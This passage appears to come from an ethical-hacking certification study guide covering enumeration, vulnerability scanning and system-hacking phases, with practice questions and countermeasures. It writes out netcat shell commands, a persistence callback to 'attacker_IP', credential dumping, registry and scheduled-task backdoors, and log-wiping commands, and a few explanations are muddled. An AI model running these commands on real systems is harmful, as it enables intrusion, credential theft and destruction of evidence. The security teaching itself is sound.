    The Logical Breakdown: A firewall should be configured to allow only necessary traffic and drop probes to closed ports silently (no RST). IDS/IPS can detect SYN floods, sequential port scans, and fingerprinting attempts. Tools like PortSentry can detect and block scanning IPs. Using network address translation (NAT) hides internal IPs. Real-world scenario: An enterprise uses a next-gen firewall that blocks IPs after detecting port scan threshold, and a security team reviews logs from IDS.

    The Technical Toolset: iptables: rules to drop stealth scans, e.g., iptables -A INPUT -p tcp --tcp-flags ALL NONE -j DROP (drop NULL scans). pfSense, Snort (IDS rule: alert tcp any any -> any 80 (msg:"SYN scan"; flags:S; threshold: type both, track by_src, count 20, seconds 5;)). PortSentry (obsolete but EC-Council might mention). Honeyports.

    Exam Focus Areas (High Yield): Blocking ICMP echo requests only prevents ping sweep, not TCP scans. The best defense is closing all unnecessary ports and using IDS. The exam may ask about detecting NULL, Xmas scans (packets with unusual flags) and blocking them. Also, rate limiting scan responses helps. One critical distinction: a closed port sends RST, an open port completes handshake; a firewall that simply drops packets prevents open ports from being distinguished from filtered, but it may slow down scanning.

    Knowledge Check: Which firewall rule would best thwart a TCP NULL scan?
    A) Allow all TCP traffic
    B) Drop all ICMP echo requests
    C) Drop packets with no TCP flags set
    D) Drop SYN packets
    Correct: C – NULL scan sends packets with no flags; dropping them prevents response. (A would allow everything; B only stops ping; D would break normal connections.)

Sub-Domain: Enumeration

Topic: Enumeration Concepts

    The 80/20 Summary: Enumeration is the process of extracting valid accounts, shared resources, and application details from a system. It's active and more intrusive than scanning, establishing connections to services. Attackers use it to find user names, group memberships, network shares, and SNMP data.

    The Logical Breakdown: After identifying open ports, enumeration connects to those services and issues queries. For example, connecting to SMB on port 445 and attempting to list shares with null sessions. The goal is to gather data that facilitates gaining access. Real-world scenario: Attacker uses enum4linux against a Windows target to extract user lists, groups, and password policy, then launches a password spray attack.

    The Technical Toolset: enum4linux (perl script): enum4linux -U -S target (user and share enumeration). SMBclient: smbclient -L //target -N (list shares). Nmap NSE scripts: nmap --script=smb-enum-shares,smb-enum-users -p445 target. SNMPwalk: snmpwalk -c public -v1 target. LDAPsearch: ldapsearch -x -h target -b "dc=domain,dc=com".

    Exam Focus Areas (High Yield): Enumeration uses valid connections, so it's logged. Windows SMB null sessions (NetBIOS port 139 and SMB 445) are a primary vector. Ports: NetBIOS 137-139, SMB 445, LDAP 389, SNMP 161. Countermeasure: Disable SMBv1, restrict null sessions, use SNMPv3 with authentication, and lock out accounts after failed attempts.

    Knowledge Check: An attacker establishes a null session to a target’s port 445 and lists user accounts. Which service was exploited?
    A) SNMP
    B) LDAP
    C) SMB
    D) Telnet
    Correct: C – Null session is an unauthenticated connection to Windows SMB service on port 445 (or 139). (A uses port 161; B port 389; D port 23.)

Topic: NetBIOS Enumeration

    The 80/20 Summary: NetBIOS over TCP/IP (NBT) allows legacy Windows systems to share resources. Attackers use NetBIOS name lookups and null sessions to retrieve the NetBIOS name table, list domain names, and enumerate shares and users.

    The Logical Breakdown: NetBIOS listens on ports 137 (name service), 138 (datagram), 139 (session). An attacker queries these ports to get machine name, domain/workgroup, and list of registered names (including logged-in users). Real-world: Using nbtstat -A <IP> gets the NetBIOS name table showing computer name and currently logged-on user.

    The Technical Toolset: nbtstat: nbtstat -A 192.168.1.10 (Windows), reveals names and services. Net view: net view \\192.168.1.10 (list shares). Enumeration tools: Hyena, DumpSec. Nmap: nmap -sU -p 137 --script nbstat.nse target outputs NetBIOS name info.

    Exam Focus Areas (High Yield): Port 139 is NetBIOS session service; port 445 is direct SMB without NetBIOS. nbtstat output flags: <00> workstation service, <20> file server service, <03> messenger (username). EC-Council often asks about the command nbtstat -a <name> vs -A <IP>. Countermeasure: Disable NetBIOS over TCP/IP if not needed, or block ports 137-139 at firewall.

    Knowledge Check: An attacker runs nbtstat -A 10.0.0.5 and sees <00> UNIQUE, <20> UNIQUE, <03> UNIQUE. What can be concluded?
    A) The system is a domain controller
    B) The system is a file server with a user logged in
    C) The system is a Linux machine
    D) The system has port 445 closed
    Correct: B – <20> indicates file sharing service; <03> indicates the messenger service user. (A domain controller has <1C>; C Linux doesn't run NetBIOS; D not indicated.)

Topic: SNMP Enumeration

    The 80/20 Summary: SNMP (Simple Network Management Protocol) allows management of network devices. Attackers exploit default community strings (public/private) to read device configurations, user accounts, and network information via SNMPwalk.

    The Logical Breakdown: SNMP agents listen on UDP port 161. Using a read community string (like "public"), an attacker can issue SNMP GET requests to extract MIB (Management Information Base) data, such as running processes, installed software, and TCP connections. Real-world: Attacker runs snmpwalk -c public -v2c router_ip and extracts the entire routing table and ARP cache, mapping internal network.

    The Technical Toolset: snmpwalk: snmpwalk -c public -v1 10.0.0.1 (walks entire MIB tree). snmpcheck: snmp-check 10.0.0.1 -c public (enumerates users, processes, etc.). Nmap: nmap -sU -p 161 --script=snmp* 10.0.0.1. Onesixyone: fast SNMP community string scanner.

    Exam Focus Areas (High Yield): Port 161 (UDP). Community strings: public (read-only), private (read-write). SNMP versions: v1/v2c send community in clear; v3 encrypts. The exam may ask which MIB contains user accounts? (hrSWRunTable, but it's process table; user enumeration often from hrSystemUsers). The specific countermeasure is to use SNMPv3, restrict to specific IPs, and use complex community strings.

    Knowledge Check: A penetration tester scans the target with nmap -sU -p 161 --script snmp-info and finds a device with community string "public". What risk does this pose?
    A) The device can be rebooted
    B) Configuration and sensitive data can be read
    C) Passwords can be changed
    D) A denial-of-service can be launched
    Correct: B – "public" is read-only, allows reading sensitive data. Read-write ("private") would allow changes. (A/C require write access; D not primary risk.)

Topic: LDAP Enumeration

    The 80/20 Summary: LDAP (Lightweight Directory Access Protocol) provides access to directory services like Active Directory. Attackers query LDAP anonymously or with compromised credentials to list users, groups, computers, and organizational structure.

    The Logical Breakdown: LDAP runs on TCP port 389 (or 636 for LDAPS). An attacker performs an LDAP search with a base distinguished name (DN) and filter to dump all objects. Tools like ldapsearch allow anonymous binds if misconfigured. Real-world: Using ldapsearch -x -h dc01 -b "dc=company,dc=com" "(objectclass=user)" extracts all user names.

    The Technical Toolset: ldapsearch: ldapsearch -x -h 10.0.0.1 -b "dc=example,dc=com" (anonymous query). Nmap: nmap -p 389 --script ldap-search --script-args 'ldap.base="dc=example,dc=com"'. Softerra LDAP Browser (GUI). JXplorer.

    Exam Focus Areas (High Yield): Port 389 LDAP, 636 LDAPS. Anonymous LDAP access is a misconfiguration. Base DN is critical; null bind or simple authentication. Countermeasure: Require authenticated binds, disable anonymous lookups, use LDAPS or StartTLS.

    Knowledge Check: An auditor finds that the command ldapsearch -x -h 10.1.1.5 -b "dc=internal,dc=corp" returns a list of all users without prompting for credentials. What is the issue?
    A) Weak password policy
    B) Anonymous LDAP bind is enabled
    C) Missing firewall rule
    D) Open SSH port
    Correct: B – -x is simple authentication, no credentials provided, so anonymous bind allowed. (A not about password; C not directly; D unrelated.)

Topic: NTP and NFS Enumeration

    The 80/20 Summary: NTP (Network Time Protocol) can leak internal hostnames and IPs via monlist query. NFS (Network File System) exports file systems; misconfigured NFS allows unauthorized mounting and access to sensitive files.

    The Logical Breakdown: NTP runs on UDP 123. Attackers use ntpq and ntpdc to query peers and monitor lists. NFS uses port 2049 (TCP/UDP). showmount -e <target> lists exported directories; if exports have no IP restriction, attacker can mount and read/write. Real-world: Attacker uses showmount -e 10.0.0.1, finds /home exported to everyone, then mounts it and retrieves SSH keys.

    The Technical Toolset: ntpq: ntpq -c monlist <target> (if vulnerable, returns list of recent clients). NFS: showmount -e 10.0.0.1 lists exports; mount -t nfs 10.0.0.1:/exported /mnt to mount. Nmap: nmap -sU -p 123 --script ntp-monlist for NTP; nmap -p 2049 --script nfs-showmount.

    Exam Focus Areas (High Yield): NTP monlist is a known amplification vector; also reveals IP addresses of clients. EC-Council asks about NTP enumeration commands. For NFS, the critical countermeasure is to restrict exports to specific hosts and use nosuid mount option. Port numbers: NTP 123, NFS 2049.

    Knowledge Check: An attacker runs showmount -e 192.168.1.100 and sees "/data *". What does the asterisk mean?
    A) The share is encrypted
    B) The share is accessible to any host
    C) The share requires authentication
    D) The share is a pseudo file system
    Correct: B – The asterisk denotes no IP restriction, any client can mount. (A not indicated; C NFS can use AUTH_SYS but * means all; D not.)

Topic: SMTP and DNS Enumeration

    The 80/20 Summary: SMTP enumeration verifies email addresses and internal users using VRFY/EXPN commands. DNS enumeration goes beyond footprinting to query internal DNS records, perform cache snooping, and exploit zone transfers to fully map infrastructure.

    The Logical Breakdown: SMTP servers on port 25 may respond to VRFY (verify a user) and EXPN (expand mailing list). Attackers use them to harvest valid usernames. For DNS, attackers attempt DNS zone transfers (AXFR) on internal DNS servers, and use tools like dnsrecon for subdomain brute-forcing and DNS record enumeration. Real-world: Attacker connects to mail server with nc 10.0.0.1 25, enters VRFY root, if server responds with "250 root", user exists.

    The Technical Toolset: SMTP: nc -nv 10.0.0.1 25 then VRFY/EXPN. smtp-user-enum: smtp-user-enum -M VRFY -u root -t 10.0.0.1. DNS: dnsrecon dnsrecon -d example.com -t axfr, dnsenum dnsenum example.com. DNS cache snooping: dig +norecurse @ns A target.com (checks if cached).

    Exam Focus Areas (High Yield): Ports: SMTP 25, DNS 53. SMTP VRFY and EXPN should be disabled. DNS countermeasure: restrict zone transfers, disable recursion on public DNS servers. Exam trap: VRFY validates a single user, EXPN expands a mailing list. EC-Council expects you to know that SMTP enumeration can also determine mail server software via banner.

    Knowledge Check: A penetration tester connects to port 25 and issues "EXPN admin". What information does this attempt to retrieve?
    A) Verify if admin user exists
    B) List email addresses of members in the admin mailing list
    C) Test for open relay
    D) Retrieve server version
    Correct: B – EXPN expands a mailing list to show its members. (A is VRFY; C requires sending mail; D is banner.)

Topic: Other Enumeration Techniques (IPsec, VoIP, RPC, Unix/Linux, Telnet, FTP, TFTP, SMB, IPv6, and BGP enumeration)

    The 80/20 Summary: This covers enumeration on various services: IPsec (using ike-scan), VoIP (SIP enumeration with svmap), RPC/Portmapper (rpcbind on port 111), Unix/Linux user enumeration via finger (79) and rwho (513), Telnet/FTP banner grabbing, TFTP (UDP 69), SMB (further with NSE), IPv6 neighbor discovery, and BGP routing table queries.

    The Logical Breakdown: Each service leaks data. IPsec: ike-scan discovers VPN gateways. VoIP: SIP OPTIONS scan reveals extensions. RPC: rpcinfo -p lists running RPC services and version. Unix users: finger @host shows logged-in users. BGP: querying routers via looking glass to map AS and prefixes. Real-world: Attacker uses rpcinfo -p 10.0.0.1 to find NFS mount daemon, then proceeds to NFS enumeration.

    The Technical Toolset: IPsec: ike-scan -M 10.0.0.1. VoIP: svmap (from SIPVicious) svmap 10.0.0.0/24. RPC: rpcinfo -p 10.0.0.1 or nmap -sR. Unix: finger @10.0.0.1 or finger -l root@target. Telnet/FTP: telnet 10.0.0.1 banner, or nmap -sV. TFTP: tftp 10.0.0.1 GET /path (if accessible). SMB: nmblookup -A target for NetBIOS, smbclient -L target. IPv6: alive6 eth0 to discover IPv6 hosts. BGP: bgp-hacking tools, BGPdump.

    Exam Focus Areas (High Yield): Port numbers: RPC portmapper 111 (TCP/UDP), finger 79, TFTP 69, Telnet 23, FTP 21, BGP 179. RPC enumeration reveals NFS, NIS. VoIP uses SIP on 5060/5061. IPv6 enumeration uses ICMPv6. EC-Council often asks about the finger command for user enumeration. Countermeasure: Disable finger, restrict TFTP, use secure VoIP registration, filter RPC.

    Knowledge Check: An attacker runs rpcinfo -p 192.168.1.50 and sees program 100005 version 1 (mountd). What can be inferred?
    A) The host is a domain controller
    B) The host is running NFS and mountd is available
    C) The host has a web server
    D) The host is a database server
    Correct: B – mountd is part of NFS, indicating NFS shares. (A would show LDAP/Kerberos; C port 80; D SQL ports.)

Topic: Enumeration Countermeasures

    The 80/20 Summary: Disable unnecessary services, enforce authentication for queries, restrict access via firewalls, and monitor for enumeration attempts. Apply secure configurations: SNMPv3, disable null sessions, restrict RPC, disable SMTP VRFY, and use encryption.

    The Logical Breakdown: The core defense is reducing information leakage. For each service: SMB – disable SMBv1, enforce signing. LDAP – require authentication. DNS – disable zone transfers. SNMP – use strong community strings or v3. Monitor logs for repeated queries, failed connections, and use IDS signatures for enumeration tools. Real-world: An administrator configures Windows to "Network access: Restrict anonymous access to Named Pipes and Shares" to prevent null session user listing.

    The Technical Toolset: Group Policy for Windows (null session restrictions). firewall rules: iptables -A INPUT -p tcp --dport 139 -j DROP if not needed. Snort rules for detection. Nessus checks for these misconfigurations. Audit tools: Microsoft Baseline Security Analyzer.

    Exam Focus Areas (High Yield): EC-Council expects you to match specific countermeasure to enumeration technique. For SNMP: disable default communities, use ACL. For LDAP: disable anonymous bind. For SMTP: disable VRFY/EXPN. For DNS: restrict zone transfers. For NFS: export with limited hosts. Also, patch systems and keep services updated.

    Knowledge Check: Which configuration change best prevents an attacker from using null sessions to enumerate users on a Windows server?
    A) Disable port 445
    B) Set RestrictAnonymous registry key to 1
    C) Use SNMPv3
    D) Disable ICMP
    Correct: B – Setting RestrictAnonymous=1 in Windows prevents anonymous SMB enumeration without authentication. (A blocking port 445 may break file sharing; C SNMP unrelated; D ICMP unrelated.)

(Continuing to Domain 3 next...)## Domain 3: System Hacking Phases and Attack Techniques
Sub-Domain: Vulnerability Analysis

Topic: Vulnerability Assessment Concepts

    Core Concept: Vulnerability assessment identifies, classifies, and prioritizes vulnerabilities in systems. Attackers use these to find weaknesses; defenders assess to patch them. It's a proactive security process.

    Key Tools: Nessus (nessuscli scan new – or via GUI), OpenVAS (gvm-cli --create-task), Nikto (web: nikto -h http://target.com).

    Critical Port Numbers/Protocols: N/A (assessment tools often scan common ports).

    Exam Trap: Vulnerability assessment is not the same as penetration testing; it is a broader process of scanning and reporting, while pen testing includes exploitation. EC-Council tests that a VA can be automated, but pen testing requires human skill.

    Countermeasure: Perform regular vulnerability scans, maintain an asset inventory, and implement a patch management process.

    MCQ: A security team runs a Nessus scan and receives a report listing CVSS scores for each finding. What does the CVSS score represent?
    A) The vendor’s patch priority
    B) The severity of the vulnerability
    C) The exploitability index
    D) The network criticality
    Correct: B – CVSS (Common Vulnerability Scoring System) quantifies severity. (A patch priority influenced by CVSS but not the score itself; C is a component; D unrelated.)

Topic: Vulnerability Classification and Assessment Types

    Core Concept: Vulnerabilities are classified by type (misconfiguration, missing patches, default passwords, design flaws). Assessment types include network-based, host-based, application-layer, and wireless. Attackers often target known CVE listings.

    Key Tools: Nmap NSE (--script vuln), Nessus (credentialed vs non-credentialed), Qualys.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: Credentialed scans provide more accurate results (fewer false positives) because they log in and assess from inside. Non-credentialed scans run from external view. EC-Council may ask which scan finds missing patches reliably: credentialed scan.

    Countermeasure: Regular credentialed scans, patch management, configuration baselines, and security hardening.

    MCQ: An auditor wants to detect missing security patches on 100 Windows servers. Which assessment approach yields the most reliable results?
    A) Unauthenticated network scan
    B) Credentialed scan with local admin rights
    C) Social engineering test
    D) Phishing simulation
    Correct: B – With credentials, the scanner can query the OS for installed patches directly, reducing false positives. (A may infer from banners; C/D not patch-related.)

Topic: Vulnerability Assessment Tools

    Core Concept: Tools automate the scanning process. EC-Council covers Nessus, OpenVAS, GFI LanGuard, Qualys, Nexpose, and Nikto (web). They identify vulnerabilities, misconfigurations, and compliance issues.

    Key Tools: Nessus: nessuscli scan new --name "MyScan" --target 192.168.1.1. OpenVAS: gvm-cli socket --xml "<create_task>...</create_task>". Nikto: nikto -h 10.0.0.1 -p 80.

    Critical Port Numbers/Protocols: Default port for Nessus web interface: 8834. OpenVAS: 9392.

    Exam Trap: Know which tool is for web server scanning: Nikto. Nessus/OpenVAS are general network vulnerability scanners. GFI LanGuard is often used for patch management and network auditing. EC-Council might ask about commercial vs open-source.

    Countermeasure: Use these tools for self-assessment, but also rely on manual validation to avoid false negatives.

    MCQ: Which vulnerability assessment tool is specifically designed to test web servers for dangerous files and misconfigurations?
    A) Nessus
    B) OpenVAS
    C) Nikto
    D) Wireshark
    Correct: C – Nikto is a web server scanner. (A/B are general; D is packet analyzer.)

Topic: Vulnerability Assessment Reports

    Core Concept: Reports translate technical findings into actionable items. They typically include executive summary, methodology, findings with risk ratings, and remediation steps. Attackers don't generate reports, but defenders use them for risk management.

    Key Tools: Dradis (reporting framework), Faraday, MagicTree. Many scanners generate built-in PDF/HTML reports.

    Critical Port Numbers/Protocols: N/A

    Exam Trap: The most critical part of a report for management is the executive summary with risk prioritization. The technical details are for IT staff. EC-Council may ask about the importance of false positives in reports (they should be minimized and noted).

    Countermeasure: Validate findings, track remediation with a ticketing system, and conduct re-scans to verify fixes.

    MCQ: A vulnerability report identifies a critical remote code execution flaw with a CVSS of 9.8. What is the best first action for the recipient?
    A) Disable the server’s firewall
    B) Immediately apply the vendor patch or mitigation
    C) Shut down the server permanently
    D) Ignore it if the server is not internet-facing
    Correct: B – The high-risk vulnerability should be patched or mitigated according to the organization’s change management. (A would worsen security; C extreme; D still risk from internal threats.)

Sub-Domain: System Hacking

Topic: System Hacking Concepts

    The 80/20 Summary: System hacking is the phase where attackers exploit vulnerabilities to gain unauthorized access to a system. It includes gaining access, escalating privileges, maintaining access (backdoors), and clearing tracks. The goal is to get root/admin control.

    The Logical Breakdown: After enumeration, attacker identifies an exploitable vulnerability (e.g., weak password, software flaw). They craft an attack (password cracking, buffer overflow) to gain a foothold. Then they escalate to higher privileges if needed, install backdoors for persistent access, and finally delete logs to hide. Real-world: Attacker uses a phishing email to steal user credentials, logs in via RDP (gaining access), exploits a kernel vulnerability to get SYSTEM (privilege escalation), and installs a remote access trojan (maintaining access), then clears Windows event logs.

    The Technical Toolset: Metasploit: exploit command. Password crackers: John the Ripper, Hydra. Windows: mimikatz for credential dumping. Privilege escalation: windows-exploit-suggester, linux-exploit-suggester. Log clearing: wevtutil cl Security (Windows), shred /var/log/* (Linux). Backdoors: netcat listener nc -lvp 4444 -e cmd.exe.

    Exam Focus Areas (High Yield): The four phases: Gaining Access, Escalating Privileges, Maintaining Access, Clearing Logs. Countermeasure: Strong authentication, patching, least privilege, audit logging to a remote server.

    Knowledge Check: An attacker has a limited user shell on a Linux box. Which action is part of the "Escalating Privileges" phase?
    A) Cracking the root password using John the Ripper
    B) Running a kernel exploit to gain root
    C) Installing a keylogger
    D) Deleting the bash history
    Correct: B – Exploiting a kernel vulnerability to elevate privileges is privilege escalation. (A is password cracking; C/D are post-exploitation/persitence/clearing tracks.)

Topic: Gaining Access

    The 80/20 Summary: Gaining access is the initial breach into a system, typically through exploiting vulnerabilities, cracking passwords, or social engineering. It can be at OS level (command shell) or application level.

    The Logical Breakdown: Using the information from previous phases, attacker delivers an exploit. For example, a stack buffer overflow in a network service to get a reverse shell. Or using cracked credentials to log in. Real-world: Attacker exploits SMB vulnerability (EternalBlue) to gain SYSTEM-level shell on unpatched Windows 7.

    The Technical Toolset: Metasploit: use exploit/windows/smb/ms17_010_eternalblue. Hydra: hydra -l admin -P pass.txt 192.168.1.1 ssh. Netcat: nc victim_ip 1234 -e /bin/sh (listener). Password spray: crackmapexec smb target -u users.txt -p Password1.

    Exam Focus Areas (High Yield): The difference between remote and local exploitation. Gaining access often results in a shell. Ports: commonly attacked services: SMB 445, RDP 3389, SSH 22, FTP 21, HTTP 80. Countermeasure: Patching, strong passwords, network segmentation, MFA.

    Knowledge Check: An attacker exploits a web application’s file upload vulnerability to upload a PHP web shell, then navigates to the shell URL and executes commands. Which phase of system hacking just occurred?
    A) Privilege escalation
    B) Gaining access
    C) Maintaining access
    D) Clearing tracks
    Correct: B – The attacker just gained access (command execution) via the web shell. (A would be if the shell user is limited and they try to get root; C installing persistence; D later.)

Topic: Password Cracking

    The 80/20 Summary: Password cracking is the process of recovering passwords from stored or transmitted data. Techniques: dictionary attacks, brute force, hybrid, rule-based, rainbow tables. Attackers target SAM file, /etc/shadow, network authentication hashes.

    The Logical Breakdown: Windows stores hashes in SAM (local) or NTDS.dit (domain). Tools extract hashes (pwdump, mimikatz). Then attackers crack offline using John the Ripper or Hashcat. Real-world: Attacker dumps NTLM hash from LSASS using mimikatz, runs hashcat with a wordlist and rules to crack it within minutes if weak.

    The Technical Toolset: Mimikatz: sekurlsa::logonpasswords. Hashcat: hashcat -m 1000 hashes.txt rockyou.txt (cracking NTLM). John: john --format=NT hashes.txt. Hydra: online brute-force hydra -l admin -P list.txt ssh://target. CeWL: custom wordlist generator from website cewl target.com.

    Exam Focus Areas (High Yield): LM hashes are weak and disabled in Vista+. NTLM hash used for authentication. Rainbow tables trade time for storage; using salt defeats rainbow tables (Windows uses no salt for NTLM, but LM is salted? Actually LM has no salt, but modern systems use Kerberos). EC-Council will ask about the difference between dictionary and brute-force. Countermeasure: Strong password policy, account lockout, salting, multi-factor authentication.

    Knowledge Check: A security analyst obtains an NTLM hash "B4B9B02E6F09A9BD760F388B67351E2B". Which tool can most efficiently crack it with a precomputed table?
    A) Hydra
    B) RainbowCrack
    C) Netcat
    D) Wireshark
    Correct: B – RainbowCrack uses precomputed rainbow tables for fast lookup. (A is online brute-force; C/D not crackers.)

Topic: Vulnerability Exploitation

    The 80/20 Summary: Exploitation leverages a vulnerability to execute arbitrary code or commands. Attackers use exploit frameworks (Metasploit) or manually crafted proof-of-concept code. The exploit must match the vulnerability and target architecture.

    The Logical Breakdown: Identify a vulnerability via scanning; find or write an exploit (e.g., a Python script for a specific buffer overflow). Set up payload (reverse shell, bind shell). Trigger the exploit to gain access. Real-world: Attacker discovers Apache Struts CVE-2017-5638; uses Metasploit module to send malicious Content-Type header, gets remote code execution.

    The Technical Toolset: Metasploit: search struts2, use exploit/multi/http/struts2_content_type_ognl, set RHOSTS, set PAYLOAD, exploit. Searchsploit (Exploit-DB): searchsploit apache 2.4. Immunity Debugger for exploit development. Mona.py for pattern creation.

    Exam Focus Areas (High Yield): Payloads: singles (self-contained), stagers (small, download larger stage), stages (the full payload). Meterpreter is an advanced payload. Metasploit post-exploitation modules. Countermeasure: Patch promptly, use intrusion prevention systems, and application whitelisting.

    Knowledge Check: In Metasploit, which command would you use to list all available exploits for a specific vendor?
    A) search name:Microsoft
    B) show exploits
    C) use auxiliary/scanner/portscan
    D) setg RHOSTS
    Correct: A – search with keywords filters modules. (B shows all exploits loaded; C is an auxiliary; D sets global variable.)

Topic: Escalating Privileges

    The 80/20 Summary: After initial access (often with limited user), attackers elevate to Administrator/root to gain full control. Techniques: kernel exploits, misconfigured services, Windows token manipulation (UAC bypass), DLL hijacking, and sudo misconfigurations.

    The Logical Breakdown: Attackers run local enumeration scripts (WinPEAS, LinPEAS) to find privilege escalation vectors. In Windows, a missing patch for kernel (e.g., MS16-032) can give SYSTEM. In Linux, SUID binaries, sudo rules (e.g., sudo vim can spawn shell). Real-world: Limited user finds that service binary path has spaces and no quotes, allowing unquoted service path exploit to run malicious binary as SYSTEM.

    The Technical Toolset: Windows: PowerUp (Invoke-AllChecks), SharpUp, winPEAS. Linux: linpeas.sh, LinEnum. Metasploit: getsystem command (uses multiple techniques). Kernel exploits: precompiled executables (e.g., CVE-2021-3156 sudoedit). Sudo exploitation: sudo -l then GTFO bins.

    Exam Focus Areas (High Yield): Unquoted service path is a classic Windows privesc. UAC bypass is needed for admin tasks if admin but not elevated. In Linux, SUID bit misconfiguration allows executing as owner. Countermeasure: Apply least privilege, patch kernel, proper service configurations, and audit sudo rights.

    Knowledge Check: A hacker has a low-privilege shell on a Windows 10 machine and runs whoami /priv to see SeImpersonatePrivilege enabled. What attack is most suitable?
    A) DLL hijacking
    B) Pass the hash
    C) Potato attack (Juicy/Rotten)
    D) SQL injection
    Correct: C – SeImpersonatePrivilege can be exploited with potato attacks to get SYSTEM token. (A different trigger; B is lateral movement; D web.)

Topic: Maintaining Access

    The 80/20 Summary: Attackers ensure they can return to the compromised system even if the initial vulnerability is patched. They install backdoors, create new user accounts, open listener ports, or use remote administration tools.

    The Logical Breakdown: After gaining high privileges, attacker establishes persistent access. For Windows, adding a local admin account, installing a remote access trojan (RAT) that calls back periodically, or modifying startup entries. For Linux, adding a cron job, SSH key. Real-world: Attacker runs net user hacker P@ssw0rd /add and net localgroup administrators hacker /add, then installs a netcat listener as a service.

    The Technical Toolset: Metasploit persistence modules: run persistence -U -i 10 -p 4444 -r attacker_IP. Windows: reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Run /v Updater /t REG_SZ /d C:\backdoor.exe. Netcat: nc -lvp 4444 -e cmd.exe (via scheduled task). RAT: DarkComet, njRAT. SSH backdoor: ssh-keygen on attacker and copy to victim's ~/.ssh/authorized_keys.

    Exam Focus Areas (High Yield): Known backdoor ports: NetBus 12345, SubSeven 27374. Countermeasure: Monitor for new user accounts, unusual processes, port scans, and check startup directories and scheduled tasks.

    Knowledge Check: A penetration tester successfully gains SYSTEM access on a server and wants to maintain access without detection. Which method is stealthiest?
    A) Install a new Windows service with a misleading name
    B) Add a cron job calling back to a C2 server using HTTPS
    C) Create a new domain admin account
    D) Open a port in firewall
    Correct: B – (Assume target is Linux, the question scenario may imply cross-platform, but B describes stealthy scheduled callback over encrypted channel, hard to detect. A new service may be detected; C new admin account is obvious; D firewall hole is visible.)

Topic: Executing Applications

    The 80/20 Summary: Attackers execute malicious applications (keyloggers, spyware, trojans) on the compromised system to gather data, cause damage, or further the attack. This often happens after gaining access and privilege escalation.

    The Logical Breakdown: Once the attacker has sufficient privileges, they upload and run executable files. This can be done via shell commands, Metasploit's execute command, or by abusing legitimate tools (Living off the Land). Real-world: Attacker uses Meterpreter to upload a keylogger, then runs execute -f keylogger.exe to capture credentials.

    The Technical Toolset: Metasploit: upload /path/to/malware.exe C:\\Windows\\Temp then execute -f malware.exe. PsExec: psexec \\target -u admin -p pass cmd. Powershell: powershell -ExecutionPolicy Bypass -File evil.ps1. Sysinternals tools abused.

    Exam Focus Areas (High Yield): The exam may ask about remote execution tools: PsExec, WMIC. Also, DLL injection to run code in another process. Countermeasure: Application whitelisting (AppLocker, WDAC), antivirus, and endpoint detection.

    Knowledge Check: An attacker wants to run a malicious binary on a compromised Windows target without leaving it on disk. Which technique is most appropriate?
    A) Fileless execution using PowerShell to reflectively load the binary in memory
    B) Copy the exe to startup folder
    C) Schedule a task to run the exe
    D) Install as a service
    Correct: A – Fileless execution keeps the payload only in memory, evading disk forensics. (B/C/D all write to disk.)

Topic: Hiding Files

    The 80/20 Summary: Attackers hide malicious files to evade detection by users and antivirus. Techniques: NTFS Alternate Data Streams (ADS), steganography, hidden attributes, rootkits, and fileless storage.

    The Logical Breakdown: On NTFS, an attacker can hide a payload inside an ADS of a legitimate file, e.g., type malware.exe > visible.txt:hidden.exe. The file appears unchanged in Explorer. In Linux, placing dot files or using kernel rootkits. Real-world: Attacker hides a RAT in an ADS associated with a notepad.exe file, then executes it via wmic process call create C:\Windows\System32\notepad.exe:hidden.exe.

    The Technical Toolset: ADS: type calc.exe > readme.txt:calc.exe and start .\readme.txt:calc.exe. Steganography: OpenStego, Snow (whitespace), Steghide (steghide embed -cf image.jpg -ef secret.txt). Rootkits: Hacker Defender (userland). Linux: hide files with mv malware .malware.

    Exam Focus Areas (High Yield): ADS only works on NTFS. Detecting ADS using dir /r or streams.exe. Countermeasure: File integrity monitoring, AV that scans ADS, and using file systems without ADS support for sensitive areas.

    Knowledge Check: A suspect’s machine has a file picture.jpg. Forensic analysis reveals hidden data within it using steghide. What technique was used?
    A) Alternate Data Streams
    B) Steganography
    C) Rootkit
    D) Encryption
    Correct: B – Steganography hides data inside another file. (A ADS is a file system feature; C rootkit hides system artifacts; D encryption would make the whole file unreadable without key.)

Topic: Establishing Persistence

    The 80/20 Summary: Persistence ensures that the attacker’s access survives reboots and logoffs. Common methods: registry Run keys, scheduled tasks, startup folder, Windows services, WMI event subscriptions, and cron jobs.

    The Logical Breakdown: After compromising a system, the attacker needs a callback mechanism that automatically starts. Using the registry HKCU\Software\Microsoft\Windows\CurrentVersion\Run or HKLM equivalent; placing a shortcut in the startup folder; or creating a service. Real-world: Attacker drops a binary and creates a scheduled task that runs every hour to execute the payload, calling back to C2.

    The Technical Toolset: Metasploit: run persistence -X (install as service). Empire: persistence modules. Manual: schtasks /create /tn "Update" /tr C:\temp\backdoor.exe /sc hourly. Registry: reg add HKLM\...\Run /v "Updater" /d C:\backdoor.exe. Linux: crontab -e add */10 * * * * /tmp/backdoor.

    Exam Focus Areas (High Yield): EC-Council tests registry paths for startup. Also WMI permanent event subscription as a stealthier method. Countermeasure: Monitor startup locations, enable AppLocker, restrict user privileges, and review scheduled tasks.

    Knowledge Check: Which Windows registry key is commonly used for per-machine persistence that runs a program at every logon for any user?
    A) HKCU\Software\Microsoft\Windows\CurrentVersion\Run
    B) HKLM\Software\Microsoft\Windows\CurrentVersion\Run
    C) HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
    D) HKLM\System\CurrentControlSet\Services
    Correct: B – HKLM...Run runs for all users. (A only for current user; C runs once then deleted; D is for services, not simple startup.)

Topic: Clearing Logs

    The 80/20 Summary: Attackers delete or modify logs to remove evidence of their presence and activities. They target system logs (Windows Event Log, Linux syslog), application logs, and shell histories.

    The Logical Breakdown: After the operation, attacker clears security event logs to hide login events, privilege escalation, and executed commands. On Windows, they might use wevtutil cl or Clear-EventLog PowerShell cmdlet. On Linux, history -c and remove /var/log/auth.log. Real-world: Attacker with admin rights runs wevtutil cl Security to wipe all security events, then exits.

    The Technical Toolset: Windows: wevtutil cl System, wevtutil cl Security, Clear-EventLog -LogName Security in PowerShell. Metasploit: clearev command in Meterpreter. Linux: shred -zu /var/log/*, rm -rf /var/log, history -c. Timestomp: Metasploit’s timestomp to change file timestamps.

    Exam Focus Areas (High Yield): Log cleaning is the final phase of the hacking methodology. Countermeasure: Centralized logging to a remote syslog server or SIEM, which attackers cannot delete if properly configured, and frequent log backups.

    Knowledge Check: An attacker uses Meterpreter and types clearev. What is the effect?
    A) Clears the Windows Application, System, and Security event logs
